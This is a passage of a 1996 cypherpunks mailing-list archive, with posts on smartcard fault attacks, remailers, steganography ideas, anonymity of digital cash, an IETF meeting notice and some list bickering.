	 with a person's name?   Wow  -   
	 Am I impressive, or what?"

	 "See me - see the jig-saw puzzle of words
	 and meaning I can stick together - aren't I
	 a clever person?  See how I can convert
	 the ability to understand into a regrettable,
	 abhorrent waste of time?"

	"Look at me - hey, see what I'm doing?
	 See me stringing these words together,
	 unpleasant combinations to ponder,
	 about which you can do nothing?"

	 "Put me in a category somewhere and give
	 me significance!  I don't have anything of
	 substance to contribute to your minds, but
	 I'm unavoidable, see? Pay Attention to Me!"


...without becoming weary of his shallow "amusement".

   ..
Blanc

  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Sun, 20 Oct 1996 09:35:51 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Smartcard Torture
In-Reply-To: <199610200950.CAA15117@dfw-ix5.ix.netcom.com>
Message-ID: <v03007800ae9010eed060@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:41 AM -0700 10/20/96, Bill Stewart wrote:
>At 04:45 PM 10/18/96 -0700, John Gilmore <gnu@toad.com> wrote:
>>Note that this attack requires physical access to the DES chip, to
>>stress it so it will fail.  It works great against "tamper-proof"
>>devices such as smart cards.  It doesn't work against encryption
>>happening at any distance from the attacker (e.g. across the network).
>
>It's probably most useful for defeating attempts to force smart cards
>on the public as the government's solution to Key Recovery
>(e.g. Clipper 4 fails, so after the election they come out with Clipper 5
>or the Anti-Terrorism Airplane Traveller's License Smartcard.)

I think Bill just hit on a VIP (Very Important Point).

In most _legitimate_ uses of a smart card, e.g., where one is using it to
store one's own data (passwords, so one doesn't have to remember long
strings), there is essentially nothing to be gained by thwarting or
subverting the card. After all, _you_ programmed it, so you can program it
again, and again.

However, in the application Bill described, the Anti-Terrorism Airplane
Traveller's License Smartcard, this is a credential issued by some
government, giving one their permission to do something, to be someplace,
etc. There is a very high incentive for some holders of these cards to
thwart or subvert the intent of these credentials. A market will likely
develop wherein people bring in their identity cards to be "twiddled in the
cyclotron."

In other words, for applications where the smartcard is basically a "memory
aid," the holder has no incentive to twiddle the card and every incentive
to stop others from getting ahold of it for twiddling. But for applications
in which the smartcard is _holding someone else's data_ (cash, permissions,
etc.), and the card holder wishes to change the data, he has every
incentive to try to break the encryption and all the time in the world to
do it. He could coax (I think of it as "smartcard torture") the card into
generating the 200 or so pairs Biham and Shamir cite over a period of many
days, even.

There are some defenses, for the card issuers, that I think are reasonable.
(I haven't read the Biham-Shamir paper yet, so I don't know if they
discussed defenses.) One obvious defense against twiddling is to have the
issuing authority digitally sign some of the data in the card, just as
lottery tickets have a digital hash/signature of the actual number printed
on the back.

(Lottery tickets are the canonical example of something that are easy to
forge--even with special ticket paper (and it doesn't look very special to
me, certainly not as special as a currency note), a forger has a lot of
time (months or more) to carefully forge a ticket with the winning number
on it. And the payoff can be enormous. Given that a relatively high
percentage of winning tickets are never redeemed (are lost or forgotten),
this would seem to be a winning approach. However, the number printed on
the face of the ticket is digitally hashed/signed by a secret key and the
resulting number is printed on the _back_ of the ticket (at least in
California, and I presume nearly everywhere). Unless the forger knows the
hashing key he cannot forge a valid ticket. If public key methods are used,
verification of the hash/signature can of course be done locally, even at
the local 7-11, with the secret key safely locked in a vault under several
levels of protection.)

(Local color note: Scientific Games, the leading printer of lottery
tickets, has a major facility--possibly the main facility--a few ridges
away from me, in Gilroy, I hear. I've also heard that John Koza, of genetic
programming fame, made his fortune in this business before going to
Stanford. Don't know if he was connected to Scientific Games.)

--Tim May


"The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
that the National Security Agency would try to twist their technology."
[NYT, 1996-10-02]
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Sun, 20 Oct 1996 10:05:35 -0700 (PDT)
To: red <rednax@tm.net.my>
Subject: Re: Don't ask why, thank you. [NOISE]
Message-ID: <326A5B27.75BD@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


red wrote:
> Why?  Date: 20th October 1996.
> The purpose of life,... is not to be found. I have been pursuing
> this thought and question to many of the people I have met in the past
> few weeks. Sad enough to report that I have found no answers or clues
> that if anyone ever know what it is or could be. One thing for sure is
> material and physical objects are close to replacing the purpose, the
> real purpose if there is one.

[remainder deleted]

You could ask yourself, as a technical matter of some importance, just
how you came to be thinking about purpose, or about it in the way that
you think about it, i.e., was the thought developed in you through
bombardment from "philosophical" sources, or did you actually develop it
independently?  Try to track that down and deconstruct it, and it will
help in getting a handle on the issues you want to look at.

On the other hand, you could try what I call the Consciousness
Experiment. Intelligent persons have argued (contrary to the notions of
certain religious philosophies and possibly even quantum physicists)
that there is no *free will*, since all *things* are fully predictable,
given sufficient detachment from the universe being studied, and
sufficient resources to analyze the motions of all particles, waves,
and/or other constructs.

In the Consciousness Experiment, you get up every day and attempt to do
something *good* for which you have absolutely no motivation, kinda like
a "Mother Teresa act" or whatever.  Use your imagination.  The goal is
to separate your "purely altruistic" (for sake of argument, whether this
is real or not) acts from your base acts, i.e., eating, sleeping, and
even loving (in the sense of attachment to particular persons as opposed
to living beings or "earth things" as a whole).

If you can stay focused on the goal, to "prove" that you truly are a
sentient being and not just a living-flesh motivation-driven automaton,
then eventually you will have an answer of sorts to your question, but
with your mind in a different frame of reference or perspective, I
believe you'll be somewhat amused at your original posting on this
topic, assuming you keep a copy around.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Squirrel Remailer <nobody@squirrel.owl.de>
Date: Sun, 20 Oct 1996 06:08:33 -0700 (PDT)
To: cypherpunks@toad.com
Subject: unsibscribe?
Message-ID: <19961020113300.8359.qmail@squirrel.owl.de>
MIME-Version: 1.0
Content-Type: text/plain


"Alexander.Kvache" <alexk@hcl.com> sent the new word:
>
>unsibscribe

to the list. I am pretty sure we have seen them all, now.

OBcrypto - are these spellings randomly generated?
JMR











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Z.B." <zachb@netcom.com>
Date: Sun, 20 Oct 1996 11:56:04 -0700 (PDT)
To: Michael Peponis <mianigand@[205.164.13.10]>
Subject: Re: Writing A Remailer
In-Reply-To: <199610201626.JAA16368@toad.com>
Message-ID: <Pine.3.89.9610201114.A15718-0100000@netcom4>
MIME-Version: 1.0
Content-Type: text/plain


> > Hi all. I want to try to write a re-mailer that will run on my ISP's UNIX
> > shell account. I am familiar with Windows socket programming (C/C++) but
> > have never done anything in the UNIX environment.
> 
> One thing to note, UNIX privilages, you would want to run your 
> remailer as a deamon, a constantly running program(similar to a  DOS TSR 
> or NT Service). I am not sure if your ISP gives you enough access to 
> run deamons.
> 
> Good Luck
> Michael Peponis
>
I think you would also be able to use Procmail and Formail (two UNIX mail 
processing programs) to set up a quick and dirty remailer.  

Procmail could be set to look at the headers of a message for something 
like a header of "Remail-To:", or [REMAIL] in the Subject: header.  If it 
finds this, it would use Formail to replace the headers with generic 
information, put the specified address into the To: field, and send the 
message on its way.  I don't really know if you'd be able to set this up 
for chaining remailers or not though.



Zach Babayco 

zachb@netcom.com <-------finger for PGP public key
http://www.geocities.com/SiliconValley/Park/4127
-----
If you need to know how to set up a mail filter or defend against 
emailbombs, send me a message with the words "get helpfile" (without the 
" marks) in the SUBJECT: header.  I have several useful FAQ's and documents 
available.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Michael Peponis" <mianigand@[205.164.13.10]>
Date: Sun, 20 Oct 1996 09:26:47 -0700 (PDT)
To: William Davidheiser <cypherpunks@toad.com
Subject: Re: Writing A Remailer
Message-ID: <199610201626.JAA16368@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


> Hi all. I want to try to write a re-mailer that will run on my ISP's UNIX
> shell account. I am familiar with Windows socket programming (C/C++) but
> have never done anything in the UNIX environment.

Developing these things is actually eaiser to do in UNIX than 
Windows.

I guess it depends on where you wish to being.  Do you wish to write 
a remailer from scratch, or do you wish to just run a remailer?

In either case, take a look at what other people have done, one site 
I like is ftp.hacktic.nl, there is source for a number of remailers 
there, among other things.

You could compile that, and see what you like and dislike about a 
given remailer, and then adjust the code appropriatly.

Most are written in C, so if you know C, you won't have very many 
problems.

One thing to note, UNIX privilages, you would want to run your 
remailer as a deamon, a constantly running program(similar to a  DOS TSR 
or NT Service). I am not sure if your ISP gives you enough access to 
run deamons.

Good Luck


Michael Peponis






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: azur@netcom.com (Steve Schear)
Date: Sun, 20 Oct 1996 12:54:00 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Usenet and Re: extortion via digital cash
Message-ID: <v02130501ae8fd17fd691@[10.0.2.15]>
MIME-Version: 1.0
Content-Type: text/plain


>At 12:34 AM -0400 on 10/20/96, Scott McGuire wrote:
>
>> I've been thinking about the use of Usenet as a message pool and this
>>seems to
 be a good place to bring up my thoughts.  As an already existing, widely
disseminated and easily used message pool, Usenet is very valuable to us.
I'm concerned that it may not last though.  Many people now complain about
how low the signal to noise ratio is (even more than they complain about
this list). I've heard people say that they have given up on newsgroups in
favor of mailing list, web-zines, etc.  So, if it gets too bad, might it
just fade away? Or, if it remains but becomes unpopular, will it be easy to
restrict if we use it for anonymous messages?
>
>IMHO, it will end up similar to the late night infomerical spots on TV.
>Not puch of value there, but bored people will still look.
>
>Any effort to regulate it will come from a tangent; IDs of some sort
>to post in public, or have access to the net, or screening it out of
>the hypothetical InfoBahn II networks,  or similar.

In the U.S., at least, attempts to enforce identification of Internet users
or anonymous posters to newgroups and such are likely to meet with stiff
legal resistance.  The Supreme Court has ruled that anonymous use of
protected speech (e.g., political handbills) must be permitted.

-- Steve



PGP Fingerprint: FE 90 1A 95 9D EA 8D 61  81 2E CC A9 A4 4A FB A9
---------------------------------------------------------------------
Snoop Daty Data           | Internet: azur@netcom.com
Grinder                   |
Sacred Cow Meat Co.       |
---------------------------------------------------------------------

Counter-cultural technology development our specialty.

Vote Libertarian.

Just say NO to prescription DRUGS.

"Of all tyrannies, a tyranny sincerely exercised for
 the good of its victims may be the most oppressive."
    -- C.S. Lewis

"Surveillence is ultimately just another form of media, and thus, potential
entertainment."
    -- G. Beato






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: James Morris <jmorris@intercode.com.au>
Date: Sat, 19 Oct 1996 19:37:24 -0700 (PDT)
To: Cypherpunks <cypherpunks@toad.com>
Subject: Re: Wrap Up: Conference on Law Enforcement and Intelligence
In-Reply-To: <Pine.SUN.3.94.961019145359.19884L-100000@polaris>
Message-ID: <Pine.3.89.9610201251.C31709-0100000@aurora.intercode.com.au>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 19 Oct 1996, Black Unicorn wrote:

> 4.  Might be a good idea to review implementations of crypto.
> 
> Both James Woolsey and Stewart Baker made sly remarks about the
> reliability of crypto in the public domain. [...]

There was also an interesting comment made in session three of the 
Joint Australian/OECD Conference on Security, Privacy and Intellectual 
Property Protection in theGlobal Information Infrastructure,
(Canberra, 7 - 8 February 1996), reportedly by a representative of 
the DSD:

"... PGP may not survive as a viable option for private security."

For the full quote, see:
 http://www.nla.gov.au/gii/sess3.html

- James.
--
James Morris
<jmorris@intercode.com.au>
http://www.intercode.com.au/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Sun, 20 Oct 1996 14:00:44 -0700 (PDT)
To: cypherpunks, gnu
Subject: IETF meets in San Jose, Dec 9-13; want to come?
Message-ID: <199610202100.OAA25536@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


The Internet Engineering Task Force will hold one of its thrice-yearly
meetings in San Jose in December, making it accessible to many
cypherpunks.  (The following two meetings will be April in Memphis,
and August in Munich.)

IETF sponsors working groups which propose new protocols and
procedures to evolve the Internet technology and infrastructure.  Many
of these working groups are of interest to cypherpunks.  Working
groups are open to all interested parties and transact almost all of
their business by email.  An IETF meeting is a place where working
groups can meet and resolve issues that are hard to handle by email.
It's also a place for newcomers to the working groups to be introduced
to the issues and existing players.

An IETF meeting is not a standards committee meeting, nor is it a
technical conference.  It's a unique animal.  The working groups meet
in parallel sessions, usually several times per meeting.  Participants
are encouraged to submit any large publications by email before the
meeting, so that they can be intelligently discussed, rather than
merely read, at the meeting.  There is little or no voting, and few or
no "papers".  The working groups run by "rough consensus and running
code" -- a method near and dear to the cypherpunk credo.

There's a whole Security Area with these working groups:

aft	Authenticated Firewall Traversal 
cat	Common Authentication Technology
dnssec	Domain Name System Security
ipsec	IP Security Protocol
otp	One Time Password Authentication
pkix	Public-Key Infrastructure (X.509)
tls	Transport Layer Security
wts	Web Transaction Security

I'm actively working with the DNSSEC and IPSEC groups, on my S/WAN project.

In addition there are lots of other interesting working groups for
Mobile IP, Web evolution, MIME and email security, IPv6, Dynamic DNS
update, etc.  All of these have security implications.

For more information about any of this, see www.ietf.org.  You'll find
full info about the upcoming meeting, as well as minutes from past
meetings, working group charters and web pages, archives of working
group email lists, more info than you'll be able to read.  Many
working group sessions are multicast on the MBone for those who can't
travel to participate, and there is excellent Internet access
available on-site, with acres of terminals, printers, and
laptop-plugins.

Attending the meeting will cost $250 if postmarked before Nov 8.
Non-local c'punks who wish to attend, but who can't afford to stay in
a hotel, can probably find other c'punks in the area to stay with.
(I'm in San Francisco, 50 miles from the meeting, so I'm not a good
candidate.)  

	John




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Sun, 20 Oct 1996 14:07:40 -0700 (PDT)
To: James Morris <cypherpunks@toad.com>
Subject: Re: Wrap Up: Conference on Law Enforcement and Intelligence
Message-ID: <199610202107.OAA06194@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  1:03 PM 10/20/96 +0000, James Morris wrote:
>On Sat, 19 Oct 1996, Black Unicorn wrote:
>
>> 4.  Might be a good idea to review implementations of crypto.
>> 
>> Both James Woolsey and Stewart Baker made sly remarks about the
>> reliability of crypto in the public domain. [...]
>
>There was also an interesting comment made in session three of the 
>Joint Australian/OECD Conference on Security, Privacy and Intellectual 
>Property Protection in theGlobal Information Infrastructure,
>(Canberra, 7 - 8 February 1996), reportedly by a representative of 
>the DSD:
>
>"... PGP may not survive as a viable option for private security."
>
>For the full quote, see:
> http://www.nla.gov.au/gii/sess3.html

(1) If I were faced with an opponent who had a crypto system I couldn't
break, I would attempt to make him think I could break it so he would stop
using it.  AKA FUD.

(2) If I could break his system, I would want him to continue using it.  I
would have to be very careful about how I used the material so he didn't
catch on to the break.  There are some wonderful examples of this logic in
"The Code Breakers".

(3) The devil is in the details.  I still am not convinced that MacPGP has
enough sources of entropy for its IDEA key generation.  (But I am not
convinced that it doesn't either.)  I put integrating Jon Callas's entropy
manager into MacPGP as a high priority.


-------------------------------------------------------------------------
Bill Frantz       | Tired of Dole/Clinton?     | Periwinkle -- Consulting
(408)356-8506     | Vote 3rd party.  I'm       | 16345 Englewood Ave.
frantz@netcom.com | Voting for Harry Browne    | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "red" <rednax@tm.net.my>
Date: Sat, 19 Oct 1996 23:14:21 -0700 (PDT)
To: <tnc@asiapac.net>
Subject: Don't ask why, thank you.
Message-ID: <199610200616.OAA02136@gandalf.asiapac.net>
MIME-Version: 1.0
Content-Type: text/plain


Why?

Date: 20th October 1996.
        The purpose of life,... is not to be found. I have been pursuing
this
thought and question to many of the people I have met in the past few
weeks.
Sad enough to report that I have found no answers or clues that if anyone
ever
know what it is or could be. One thing for sure is material and physical
objects are close to replacing the purpose, the real purpose if there is
one.
I am still quizzed on how there is a purpose in which we all strive to
attain.
There must an objective somewhere which clearly states,"You, whatname
whatage,
will have to do this, do that."
        Somehow, in the pursuit for the answer I have strained my physical
and emotional self. I have realised what I am doing and that I am actually
directionless, like all the people I know. Doing things for the sake of
doing.
Clearly, I think television or rather, the mass media in general has caused
the gradual eradication of purpose in life for many people. What do you
want?
What do I want? Sure enough, we do not ask ourselves that question once too
often, but spending more time pondering about it, it really makes no sense
in what we do having corellation to what we want. What is it actually that
we
seek in life?
        Which brings us back to the time when we thought we had a purpose.
Could you recall the times when you really wanted something? Or someone?
Why?
Simply because we didn't have it. It's a mass media driven, pointless race
to
own something, which actually doesn't make much sense. I am not sure why
all
of us are acting the way we are. In trying to understand it, I began to
question why I would want to know. Why do I want to know? So that I could
talk
about it? Write a book? Be famous and rich? Be respected? Now, take a
minute
off and think of what you just read. It's from the media to the people. The
people made the media. People are driving people nuts. Is this what we
want?
Once you shrink the big picture, you realise that nothing makes any sense
anyway. And what is "making sense"?
        What do we gain from realising all this which makes us act and live
the way we are? We get to past our time. Since we were born, we had nothing
except time. Shitloads of it, excuse me. So we start doing things. Things
that
actually do not mean much to us but, "heck, I've got all the time in my
life"
So, it starts to generate a sort of hype, "hey, he's doing something, maybe
I
should too." Then another fella comes in, "Well I've got nothing to do,
maybe
I should tell others what these two guys are doing" So the snowball gets
rolling. The moment it stops, if it ever stops, I guess we go crazy. Now
what
is crazy? Understanding why we actually have no reason of being here? I'm
not
going to start on religion, if you're getting my rift here.
        So here we are, pretending that we love this and like doing that.
Okay, I admit somethings are fun but 90% of the time you realise, "gee,
what
is it that I want?" If everyone were to ask the same question at the same
time,
then we'd all be crazy or something, whatever. The problem is, there's five
billion people and each one not voicing what they think would hold
themselves
back by saying "Now, if I say that, these guys would think I'm nuts, and
my..."
Some do get to express, and once they express it, they are lost in the
world
of understanding, they realise that we all have no reasons, logical or
whatsoever, to be where we are doing what we think we need to do. Now these
guys are labeled "nuts" and grouped together. See how happy they are in
"Cuckoo's Nest". Okay, so the interns are a little pain in the ass. But
look
at yourself! We are basically doing things of no relevance. Question what
you
do with "So?" You are bound to realise what you have probably tried to hide
all your life. That we are all alone. That we are all meaningless. That we
are
all trying to hide from each other what we fear.
        No, this is not a scam. And sorry, I don't have the solution.

        I guess we are the same.
        In the dark we are alone, in the bright we skin and hide.


rednax@tm.net.my
http://www.asiapac.net/~rednax

"I have seen little angels turn bad
But that's just because they have grown
Likewise the problems I currently access
They are small matters full blown"  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Sun, 20 Oct 1996 11:57:37 -0700 (PDT)
To: cypherpunks@toad.com
Subject: sprint pulled plug on cyberpromo..
Message-ID: <v03007881ae9026160675@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain


Ah. I feel *much* better now...

For the time being, anyway.

Cheers,
Bob
--- begin forwarded text


Date:         Sun, 20 Oct 1996 13:53:01 -0400
Reply-To: Law & Policy of Computer Communications
              <CYBERIA-L@LISTSERV.AOL.COM>
Sender: Law & Policy of Computer Communications
              <CYBERIA-L@LISTSERV.AOL.COM>
From: Bill Sommerfeld <sommerfeld@ORCHARD.MEDFORD.MA.US>
Subject:      sprint pulled plug on cyberpromo..
To: CYBERIA-L@LISTSERV.AOL.COM

Since this issue was brought up here a little while ago, it seems
appropriate to forward this..

(NANOG is the "North American Network Operators Group").

Subject: Re: Cyberpromo.com spam snuffed?
Date: Fri, 18 Oct 1996 20:02:17 -0400 (EDT)
From: "Todd R. Stroup" <tstroup@tstroup.inhouse.compuserve.com>
Reply-To: "Todd R. Stroup" <tstroup@tstroup.inhouse.compuserve.com>
To: pferguso@cisco.com
cc: nanog@merit.edu


On Fri, 18 Oct 1996, Paul Ferguson wrote:

> It appears that the infamous cyberpromo site has been disconnected.
>
> - paul
>
> [snip]
>
[snip]

Cyberpromo is a suspect in sending mail from a host with the name and
local domain of compuserve.com (the exact name of one of our mail
gateways)  They were creating fakeing mail headers by actually haveing a
machine on their network with the same name and domain.  I could have
thought of more creative ways to do this but this is what we saw... Since
were getting an influx of mail from upset individuals asking why
CompuServe was the host of all this spam.  After we found out what
Cyberpromo was up to, we asked for cooperation from Sprint to pull the
plug.

At this time (and to my knowledge), CompuServe has not yet made an effort
to engage in any legal action.  I am unable to comment on anything
else at this time.

Todd R. Stroup
Network Engineer - CompuServe

--- end forwarded text



-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"The cost of anything is the foregone alternative" -- Walter Johnson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sun, 20 Oct 1996 12:50:13 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Question: OTP
In-Reply-To: <199610200949.CAA15108@dfw-ix5.ix.netcom.com>
Message-ID: <F044VD16w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Bill Stewart <stewarts@ix.netcom.com> writes:

> At 07:30 PM 10/19/95 -0500, "Robert J. Shueey" <rshueey@tcgcs.com> wrote:
> >ok, not to drag this disscussion out, but apparently I am missing something.
>
> What you're missing is that the IPG guy is a troll.
> The reason there are contradictions is that he's making the stuff
> up as he goes along.  Maybe he's having a good time.  Maybe he's a
> tentacle of the spammer pretending to be D..V..

It ain't me either. Must be one of Timmy May's tentacles.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Sun, 20 Oct 1996 14:37:44 -0700 (PDT)
To: unicorn@schloss.li (Black Unicorn)
Subject: Re: [SERDAR ARGIC] Ray Arachelian's role in the genocide of 2,500,000 moslems
In-Reply-To: <Pine.SUN.3.94.961019184704.19884V-100000@polaris>
Message-ID: <199610202052.PAA05303@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> 
> I'm I the only one who is sick of Vulis' trash?
 
     No.

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Sun, 20 Oct 1996 14:40:58 -0700 (PDT)
To: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Subject: Re: Car Rental: Refusal to take Check Cards
In-Reply-To: <2Pu3VD2w165w@bwalk.dm.com>
Message-ID: <199610202055.PAA05319@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


Mr. Vulis said:
> Black Unicorn <unicorn@schloss.li> writes:
> > One would assume that on the spot clearing methods (digital cash) would
> > solve this problem.  Just TRY, however, to rent a car with real cash.
> The folks who blew up the World Trade Center rented their van with cash.

     Which is probably one of the reasons that you can no longer do things
like that.

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sun, 20 Oct 1996 17:20:47 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: extortion via digital cash
Message-ID: <199610210018.RAA20984@dfw-ix5.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:46 PM 10/15/96 -0500, Andrew Loewenstern
<andrew_loewenstern@il.us.swissbank.com> wrote:
>scottb@aca.ca writes:
>>  I was wondering, what if you demanded payment via Ecash,
>>  through nym servers, aliases, etc.  From what I understand,
>>  it is just like cash, ie: no record of transaction, but you
>>  get the added bonus of not having to meet the other party-like
>>  a fund transfer.
>
>This has been discussed quite a bit on the list before and there is even a  
>bit about it in Applied Cryptography.  Basically the extortionist must be  
>careful in how he arranges payment.  

As Andrew says, yeah, you can do it.  Chaum's Digicash is currently
implemented as payer-anonymous but not payee-anonymous, primarily because
Chaum's worried about this kind of problem.  But Chaum's original
mathematics give payee-anonymity as well, and there are ways to
adapt the payee-non-anonymous implementations to get that back
(though you'll have to write your own application code to do some of it.)
In some implementations it's sometimes easier to be payee-anonymous
if you're willing to take the risk of double-spending (i.e. trust the
payer not to double-spend the money before you can take it to
the cambio to trade it for unmarked money.)

And, yes, there are all kinds of scary applications for it,
such as Blackmail, extortion, ransom for kidnappers (which breaks the
main connection that police have with those kidnappers who really _do_
want to collect the money and return the victim alive),
and paying assassins (who have less risky payoff problems.)

It also has many non-scary but politically incorrect applications,
such as making change and trading foreign currency (aka money-laundering),
paying for politically incorrect recreational substances,
bribing politicians to do things they shouldn't, 
bribing government employees to do things they should but aren't, 
getting paid for work without the inconvenience of taxation, etc.

Tim May's Cyphernomicon and the various Blacknet authors talk about
this in some detail.  

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# You can get PGP outside the US at ftp.ox.ac.uk
  Imagine if three million people voted for somebody they _knew_,
  and the politicians had to count them all.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sun, 20 Oct 1996 17:19:06 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Stego via TCP/IP (was Re: crypto wish list)
Message-ID: <199610210018.RAA20993@dfw-ix5.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>>>Where is highly sophisticated stego?
>>What are our options?
>>- Stego in english text.
>>- Stego in audio and graphic file formats
>>- Stego in Internet Phone protocols.
>>- Stego in Internet video conference formats

My experience with CU-SeeMe has been that it loses
huge quantities of data, though that's partly because
I've only used it over 14.4 modem, which isn't really
fast enough.  If the data formats are documented,
it wouldn't be hard to add a few frames of "pictures"
every second or ten that are designed to get sidetracked.
CU-SeeMe can talk one-to-one, but is generally used through
"reflectors", which are conference bridges.
One technique is to stego-equip both the client and
reflector; a more generally useful but harder method would
be to see what you could get to pass through a reflector
between two stego clients.

Motion pictures in general give you a lot of slack;
not only do they have high data rates from uncheckable sources,
but you can hide data in ways you correct later,
e.g. for Frame1 ... Frame2 ... Frame3, 
where the values for a given pixel change between Frame1 and Frame3,
you can encode some bits by picking whether the change happened
between Frame1 and Frame2 or Frame2 and Frame3, and your output
is perfectly valid video, readable by anybody, only a bit fuzzier
than it might have been from that cheap $89 camera you're using
in bad lighting with the ceiling fan going in the background.

Stego in innocuous-looking data is another approach.
Send those spreadsheets of traffic data or SNMP stats
or daily sales of products from your supermarket or whatever!

I've been wondering about _un_sophisticated stego,
for cases where you're trying to slip below the radar
of simple bots or dumber eavesdropping thugs.  For instance,
you could send that DOS executable .exe or animated GIF
which really _does_ expand into the cover-traffic file or 
generate the annoying flaming background for your web page,
but which also drags along a bunch of stegobits that
the executable thinks are just data it's ignoring or the
GIF thinks is past the last frame.

Then there are pictures which have inherently high entropy,
so you can get away with a lot more stego - like the
animated cloud picture movie you interpolated from the
weather satellite photos, or the photo of the wheelbarrow of sawdust.

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# You can get PGP outside the US at ftp.ox.ac.uk
  Imagine if three million people voted for somebody they _knew_,
  and the politicians had to count them all.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: drose@AZStarNet.com (David M. Rose)
Date: Sun, 20 Oct 1996 17:29:28 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Car Rental: Refusal to take Check Cards
Message-ID: <199610210027.RAA12884@mailhost.azstarnet.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 20 Oct 1996, Black Unicorn wrote:

>Go try it out.  Renting cars with cash, while possible, is extremely
>difficult.

Piffle. Just look for the sleazy little car rental outfits.

I quote from the Tucson, AZ yellow pages:

"Cash Deposit Accepted. Rental Into Mexico."

"Cash Deposits Accepted. No Credit Required."

"Yes, We Can! Mexico! Cash Deposits!"

"No Credit Card Needed.  Se habla espa~nol."

"Save A Buck. Used Car Rentals. Low Low Rates. Clean-Inexpensive-Dependable.
Se Habla Espanol."

Seems easy to me (and ideal for Sub-Commando Marcos or Cody or whomever).

Dave







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Sun, 20 Oct 1996 16:24:13 -0700 (PDT)
To: azur@netcom.com (Steve Schear)
Subject: Re: Usenet and Re: extortion via digital cash
In-Reply-To: <v02130501ae8fd17fd691@[10.0.2.15]>
Message-ID: <199610202238.RAA09801@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


> >At 12:34 AM -0400 on 10/20/96, Scott McGuire wrote:
> >IMHO, it will end up similar to the late night infomerical spots on TV.
> >Not puch of value there, but bored people will still look.
> >Any effort to regulate it will come from a tangent; IDs of some sort
> >to post in public, or have access to the net, or screening it out of
> >the hypothetical InfoBahn II networks,  or similar.
> In the U.S., at least, attempts to enforce identification of Internet users
> or anonymous posters to newgroups and such are likely to meet with stiff
> legal resistance.  The Supreme Court has ruled that anonymous use of
> protected speech (e.g., political handbills) must be permitted.

      To quote the title of a movie "That was then, this is now".  

      More and more I am coming around to the idea that reliance on political
solutions to problems is a mistake. Every politician is out for what he can
get, and every judge is out to change the world. More and more judges will 
be products of an eductional system that is soured by the tenets of modern 
liberalism. The foolish notion of a benevolent paternalistic government, 
coupled with the Hallam-Baker like ideas of man as a violent wicked beast that
must be "nurtured" (i.e. controlled and lead) for his or her own good. 

     I reject the idea that all men must be controlled for their own, or
societies, good. I believe that there are good people, and bad people. I 
beleive that good people do what is right, regardless, and bad people will
find a way to take advantage of any system that is in place. 

